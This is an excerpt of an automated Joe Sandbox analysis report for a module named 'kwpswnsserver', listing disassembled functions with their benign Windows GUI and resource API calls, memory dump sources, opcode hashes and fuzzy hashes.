                                                                  • API String ID: 2431383920-3916222277
                                                                  • Opcode ID: 73e6047ed0b7ee43d38c3d2d3fb10da275762c387e8957aec613c483425f358e
                                                                  • Instruction ID: d1a49a722924bef5c3fa282bbc4955287461cdc1226e050c91288daf0aa13dac
                                                                  • Opcode Fuzzy Hash: 73e6047ed0b7ee43d38c3d2d3fb10da275762c387e8957aec613c483425f358e
                                                                  • Instruction Fuzzy Hash: 6241AD72E00229EFDB119FA4CD94AEEBB78FF45308F108528E515A7690CB35D909DB60
                                                                  Function 6C8BE74B Relevance: 17.0, APIs: 11, Instructions: 497windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8BE752
                                                                  • GetClientRect.USER32(?,?), ref: 6C8BE770
                                                                  • SetRectEmpty.USER32(?), ref: 6C8BE7C4
                                                                  • MapWindowPoints.USER32(?,?,?,00000002), ref: 6C8BE80F
                                                                  • MapWindowPoints.USER32(?,?,?,00000002), ref: 6C8BE898
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8BE8BD
                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6C8BE8E9
                                                                  • OffsetRect.USER32(?,00000000,00000000), ref: 6C8BE997
                                                                  • InflateRect.USER32(?,00000000,00000000), ref: 6C8BE9F5
                                                                  • IsRectEmpty.USER32(?), ref: 6C8BEAF3
                                                                  • IsRectEmpty.USER32(?), ref: 6C8BEC83
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$EmptyWindow$Points$ClientH_prolog3_InflateOffset
                                                                  • String ID:
                                                                  • API String ID: 302641110-0
                                                                  • Opcode ID: 53b387b58047f8964680bf187d42abc6e90db455fda9bbfd2e57e4e32e5b166f
                                                                  • Instruction ID: 8fbd74a168b4c3d4b4450ed3ae3f2dc4979b8ad14d044e33a8dabacbe7704944
                                                                  • Opcode Fuzzy Hash: 53b387b58047f8964680bf187d42abc6e90db455fda9bbfd2e57e4e32e5b166f
                                                                  • Instruction Fuzzy Hash: 60127731A00619DFDF15CFA4CA44AEEBBB6FF4A304F144569E816BB740DB71A906CB90
                                                                  Function 6C8B601E Relevance: 16.6, APIs: 11, Instructions: 149windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnableMenuItem.USER32(?,0000420F,00000001), ref: 6C8B607C
                                                                  • EnableMenuItem.USER32(?,0000420E,00000001), ref: 6C8B6097
                                                                  • CheckMenuItem.USER32(?,00004214,00000008), ref: 6C8B60CB
                                                                  • CheckMenuItem.USER32(?,00004212,00000008), ref: 6C8B60DD
                                                                  • CheckMenuItem.USER32(?,00004213,00000008), ref: 6C8B60F0
                                                                  • EnableMenuItem.USER32(?,00004212,00000001), ref: 6C8B6112
                                                                  • EnableMenuItem.USER32(?,00004212,00000001), ref: 6C8B6141
                                                                  • EnableMenuItem.USER32(?,00004213,00000001), ref: 6C8B6150
                                                                  • EnableMenuItem.USER32(?,00004214,00000001), ref: 6C8B615F
                                                                  • EnableMenuItem.USER32(?,00004215,00000001), ref: 6C8B61B1
                                                                  • CheckMenuItem.USER32(?,00004215,00000008), ref: 6C8B61C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Enable$Check
                                                                  • String ID:
                                                                  • API String ID: 1852492618-0
                                                                  • Opcode ID: c2e1d3ebc2d24d265adfd4e05779ccdf787973bafba2038ffad20a8f412b3152
                                                                  • Instruction ID: 4ae03d7ab38300aa8cc21832064da48c2716157f02acf3a062841c19ba41ccf7
                                                                  • Opcode Fuzzy Hash: c2e1d3ebc2d24d265adfd4e05779ccdf787973bafba2038ffad20a8f412b3152
                                                                  • Instruction Fuzzy Hash: 7451CC70B4062AEFDB299F15CE45A59BBB0FF05B04F008665F919FB691D7709902CFA0
                                                                  Function 6C8C8DBD Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8C8DC7
                                                                  • GetCurrentThemeName.UXTHEME(?,000000FF,?,000000FF,00000000,00000000), ref: 6C8C8E1D
                                                                  • GetThemeColor.UXTHEME(00000000,00000001,00000000,00000EEF,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 6C8C8EE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Theme$ColorCurrentH_prolog3_Name
                                                                  • String ID: Aero$Luna$homestead$metallic$normalcolor$royale
                                                                  • API String ID: 2781885202-2881773410
                                                                  • Opcode ID: de08abf829ed947572c41af13e86eab0cfc2ab20b673501b659cfc7069b8d77a
                                                                  • Instruction ID: 46c60364f3b9f7a53d87e27b355d695331c438d0d1ab3cc785a48a08aafe904a
                                                                  • Opcode Fuzzy Hash: de08abf829ed947572c41af13e86eab0cfc2ab20b673501b659cfc7069b8d77a
                                                                  • Instruction Fuzzy Hash: 6A510671A4122DAEDB34CB24CD44BDE7679AF51328F040DE6E018B2A80DF31DED4CAA5
                                                                  Function 6C8FC70E Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 139memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C8A56DD: __EH_prolog3_catch.LIBCMT ref: 6C8A56E4
                                                                  • GetModuleHandleW.KERNEL32(comctl32.dll,6C8FC88D,?,00000000,?,?,6C8AC784,?,?,?,0000001C,6C8AB5E1,?,?), ref: 6C8FC741
                                                                  • GetUserDefaultUILanguage.KERNEL32(?,?,6C8AC784,?,?,?,0000001C,6C8AB5E1,?,?), ref: 6C8FC751
                                                                  • FindResourceExW.KERNEL32(00000000,00000005,000003EE,0000FC11,?,?,6C8AC784,?,?,?,0000001C,6C8AB5E1,?,?), ref: 6C8FC78F
                                                                  • FindResourceW.KERNEL32(00000000,000003EE,00000005,?,?,6C8AC784,?,?,?,0000001C,6C8AB5E1,?,?), ref: 6C8FC7AE
                                                                  • LoadResource.KERNEL32(00000000,00000000,?,?,6C8AC784,?,?,?,0000001C,6C8AB5E1,?,?), ref: 6C8FC7BA
                                                                    • Part of subcall function 6C8FC8CB: GetDC.USER32(00000000), ref: 6C8FC91E
                                                                    • Part of subcall function 6C8FC8CB: EnumFontFamiliesExW.GDI32(00000000,?,6C8FC8B5,?,00000000,?,?,?,?,?,00000000,00000000), ref: 6C8FC939
                                                                    • Part of subcall function 6C8FC8CB: ReleaseDC.USER32(00000000,00000000), ref: 6C8FC941
                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,0000001C,6C8AB5E1,?,?), ref: 6C8FC7EA
                                                                  • GlobalFree.KERNEL32(00000001), ref: 6C8FC862
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindGlobal$AllocDefaultEnumFamiliesFontFreeH_prolog3_catchHandleLanguageLoadModuleReleaseUser
                                                                  • String ID: MS UI Gothic$comctl32.dll
                                                                  • API String ID: 1488066090-3248924666
                                                                  • Opcode ID: c584c468303de0855fe27ec5443751bbc639553c7807d1f1145583f12a70333c
                                                                  • Instruction ID: 2665fca0e23704e9e583d13c1298597842b5b2d60030f6b7adb86253184430f5
                                                                  • Opcode Fuzzy Hash: c584c468303de0855fe27ec5443751bbc639553c7807d1f1145583f12a70333c
                                                                  • Instruction Fuzzy Hash: 2C41E531200629ABD7347A69CD48BBB37ACDF46758F108939F929CBF81DB30D9428661
                                                                  Function 6C890FEA Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 94COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_catch_GS.LIBCMT ref: 6C890FF1
                                                                  • GetPropW.USER32(?,AfxOldWndProc423), ref: 6C891008
                                                                  • CallWindowProcW.USER32(?,?,00000110,?,?), ref: 6C891068
                                                                    • Part of subcall function 6C890E06: GetWindowRect.USER32(?,6C88168B), ref: 6C890E3F
                                                                    • Part of subcall function 6C890E06: GetWindow.USER32(?,00000004), ref: 6C890E5C
                                                                  • SetWindowLongW.USER32(?,000000FC,?), ref: 6C89108B
                                                                  • RemovePropW.USER32(?,AfxOldWndProc423), ref: 6C891097
                                                                  • GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6C8910A2
                                                                  • GlobalDeleteAtom.KERNEL32(?), ref: 6C8910AC
                                                                    • Part of subcall function 6C890DE2: GetWindowRect.USER32(?,00000000), ref: 6C890DEF
                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 6C8910F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catch_LongRemove
                                                                  • String ID: AfxOldWndProc423
                                                                  • API String ID: 3351853316-1060338832
                                                                  • Opcode ID: 8c392997db107ed6919e817f5b0c3113e18365699968227d29994432596d7ded
                                                                  • Instruction ID: 40e88eaf724ed71ba2f04602d1eedbe05f77611ab37fe6a7ccc96c57d5a0871a
                                                                  • Opcode Fuzzy Hash: 8c392997db107ed6919e817f5b0c3113e18365699968227d29994432596d7ded
                                                                  • Instruction Fuzzy Hash: 4A31A132905258BBCF25AFB89E588EE7E7DAF4E314B104A19F502A2A40DB31DA119760
                                                                  Function 6C888F94 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 6C888FA4
                                                                  • GetSystemMetrics.USER32(00000048), ref: 6C888FC6
                                                                  • CreateFontW.GDI32(00000000), ref: 6C888FCD
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 6C888FDB
                                                                  • GetCharWidthW.GDI32(00000000,00000036,00000036,6CA508DC), ref: 6C888FED
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 6C888FF9
                                                                  • DeleteObject.GDI32(00000000), ref: 6C889000
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 6C889009
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                                                  • String ID: Marlett
                                                                  • API String ID: 1397664628-3688754224
                                                                  • Opcode ID: fa87e49ea00251b3b1552d6a0372d31747ed361e4efd9a608a15365641ab0a48
                                                                  • Instruction ID: 8f30b4ae6a2e4bf9a8915bba7a99bd0edd30d6c3131d7b4f73585e387d5a05ac
                                                                  • Opcode Fuzzy Hash: fa87e49ea00251b3b1552d6a0372d31747ed361e4efd9a608a15365641ab0a48
                                                                  • Instruction Fuzzy Hash: 3F014F327017A27BD6356A668C5CE5B3E7CDBCBF59F208208F619E2580CA614802C771
                                                                  Function 6C890008 Relevance: 15.5, APIs: 10, Instructions: 482COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 619659579b6898efb668f19e4673e574c96a7b9495780dd8e895d7814afac29d
                                                                  • Instruction ID: 39ded044a0f082741c8e77444db665c96c4208d02c20429cfb3a58c7ec882473
                                                                  • Opcode Fuzzy Hash: 619659579b6898efb668f19e4673e574c96a7b9495780dd8e895d7814afac29d
                                                                  • Instruction Fuzzy Hash: 6E02DE31A40649DFCB25CFADCA90A9EB7B1FF4E314F108A69E915AB710D731AC41CB90
                                                                  Function 6C8E423B Relevance: 15.4, APIs: 10, Instructions: 412windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8E4245
                                                                  • GetSystemMetrics.USER32(00000004), ref: 6C8E427E
                                                                    • Part of subcall function 6C93BCCE: GetSystemMetrics.USER32(00000020), ref: 6C93BCFC
                                                                    • Part of subcall function 6C93BCCE: GetSystemMetrics.USER32(00000021), ref: 6C93BD06
                                                                    • Part of subcall function 6C93BCCE: GetSystemMetrics.USER32(00000005), ref: 6C93BD15
                                                                    • Part of subcall function 6C93BCCE: GetSystemMetrics.USER32(00000006), ref: 6C93BD1F
                                                                    • Part of subcall function 6C93BCCE: GetSystemMetrics.USER32(0000005C), ref: 6C93BD36
                                                                    • Part of subcall function 6C93BCCE: GetSystemMetrics.USER32(0000005C), ref: 6C93BD40
                                                                  • CreateCompatibleDC.GDI32(00000004), ref: 6C8E42B7
                                                                  • CreateCompatibleBitmap.GDI32(00000001,?,?), ref: 6C8E42EE
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,00000001,00000000,00000000,00CC0020), ref: 6C8E4334
                                                                  • GetSystemMetrics.USER32(00000032), ref: 6C8E44A5
                                                                  • GetSystemMetrics.USER32(00000031), ref: 6C8E44B0
                                                                  • DrawIconEx.USER32(?,?,?,00000000,00000000,?,00000000,00000000,00000003), ref: 6C8E44FB
                                                                    • Part of subcall function 6C883483: SelectObject.GDI32(?,00000000), ref: 6C8834A3
                                                                    • Part of subcall function 6C883483: SelectObject.GDI32(?,00000000), ref: 6C8834B9
                                                                    • Part of subcall function 6C8E3EBB: GetTextColor.GDI32(?), ref: 6C8E3F00
                                                                  • OffsetRect.USER32(?,?,?), ref: 6C8E45D6
                                                                  • BitBlt.GDI32(00000001,?,?,?,?,?,00000000,00000000,00CC0020), ref: 6C8E46E2
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$CompatibleCreateObjectSelect$BitmapColorDrawH_prolog3_IconOffsetRectText
                                                                  • String ID:
                                                                  • API String ID: 1542689876-0
                                                                  • Opcode ID: a1a1f12a26e4f9d2bed2f26028e74e8a201dddf2cafebece2faf3a975ebf4a64
                                                                  • Instruction ID: 758f07cf8bc085b941a4a0827fef7917e9a6f750d3c322bc8b43dcd302b6c9a0
                                                                  • Opcode Fuzzy Hash: a1a1f12a26e4f9d2bed2f26028e74e8a201dddf2cafebece2faf3a975ebf4a64
                                                                  • Instruction Fuzzy Hash: 50023471E00219DFCF25CFA8C944ADEBBB5FF89304F108569E919AB250DB71A946CF50
                                                                  Function 6C8B8F8F Relevance: 15.2, APIs: 10, Instructions: 233COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C9092D3
                                                                    • Part of subcall function 6C883E38: __EH_prolog3.LIBCMT ref: 6C883E3F
                                                                    • Part of subcall function 6C883E38: GetWindowDC.USER32(00000000,00000004,6C89E3DA,00000000), ref: 6C883E6B
                                                                  • GetClientRect.USER32(?,?), ref: 6C9092FD
                                                                  • GetWindowRect.USER32(?,?), ref: 6C909314
                                                                    • Part of subcall function 6C883F50: ScreenToClient.USER32(?,6C8993A1), ref: 6C883F5F
                                                                    • Part of subcall function 6C883F50: ScreenToClient.USER32(?,6C8993A9), ref: 6C883F6C
                                                                  • OffsetRect.USER32(?,?,?), ref: 6C909336
                                                                    • Part of subcall function 6C88391D: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 6C883954
                                                                    • Part of subcall function 6C88391D: ExcludeClipRect.GDI32(00000000,?,?,?,?), ref: 6C883971
                                                                    • Part of subcall function 6C89BAAC: GetWindowLongW.USER32(?,000000EC), ref: 6C89BAB9
                                                                  • GetWindowRect.USER32(?,?), ref: 6C90938A
                                                                  • GetRgnBox.GDI32(?,?), ref: 6C9093A5
                                                                  • OffsetRect.USER32(?,?,?), ref: 6C9093BF
                                                                  • CreateRectRgnIndirect.GDI32(?), ref: 6C9093D9
                                                                    • Part of subcall function 6C8839DF: ExtSelectClipRgn.GDI32(?,00000000,?), ref: 6C883A02
                                                                    • Part of subcall function 6C8839DF: ExtSelectClipRgn.GDI32(?,00000000,?), ref: 6C883A1B
                                                                  • OffsetRgn.GDI32(?,?,?), ref: 6C909414
                                                                  • OffsetRect.USER32(?,?,?), ref: 6C909435
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$ClipOffsetWindow$Client$ExcludeScreenSelect$CreateH_prolog3H_prolog3_IndirectLong
                                                                  • String ID:
                                                                  • API String ID: 3148124242-0
                                                                  • Opcode ID: a3c771e45c215447b148b3ebcec222ee56fce55da07a76b4c66886727598e483
                                                                  • Instruction ID: 407cce7202c5b910a0947eeb485ab7517002a7ea28fff315b6dbfc18dfa94a51
                                                                  • Opcode Fuzzy Hash: a3c771e45c215447b148b3ebcec222ee56fce55da07a76b4c66886727598e483
                                                                  • Instruction Fuzzy Hash: E0913E71E0022D9FCF15DFA8CD94AEEB7B9FF49308F154219E40AAB650EB34A945CB50
                                                                  Function 6C8C29F0 Relevance: 15.2, APIs: 10, Instructions: 224timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 6C8C2A37
                                                                  • ScreenToClient.USER32(?,?), ref: 6C8C2A44
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8C2A83
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8C2AA8
                                                                  • KillTimer.USER32(0000EC16,0000EC16), ref: 6C8C2ADB
                                                                  • InvalidateRect.USER32(00000001,?,00000001), ref: 6C8C2AF3
                                                                  • InvalidateRect.USER32(00000001,?,00000001), ref: 6C8C2B05
                                                                  • KillTimer.USER32(00000000,0000EC15), ref: 6C8C2C6C
                                                                  • ValidateRect.USER32(00000000,00000000), ref: 6C8C2C99
                                                                  • RedrawWindow.USER32(00000000,00000000,00000000,00000185,00000000,00000000,00000000), ref: 6C8C2CD6
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$InvalidateKillTimer$ClientCursorRedrawScreenValidateWindow
                                                                  • String ID:
                                                                  • API String ID: 1459077570-0
                                                                  • Opcode ID: 72302d310ec24da828d3d18a9aa290b3342cfd4bc0db5cd8f0dba8ca1dbcb5b3
                                                                  • Instruction ID: 352e9621cf0116fa83bde300df56bdd71a0269e8d29f0c76ba344a0277a64ebd
                                                                  • Opcode Fuzzy Hash: 72302d310ec24da828d3d18a9aa290b3342cfd4bc0db5cd8f0dba8ca1dbcb5b3
                                                                  • Instruction Fuzzy Hash: 8E917171B0061AEFCB29DF78CA989ADF7B8FF49308F004665E415E3690DB34A951DB81
                                                                  Function 6C8A28DE Relevance: 15.2, APIs: 10, Instructions: 212timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
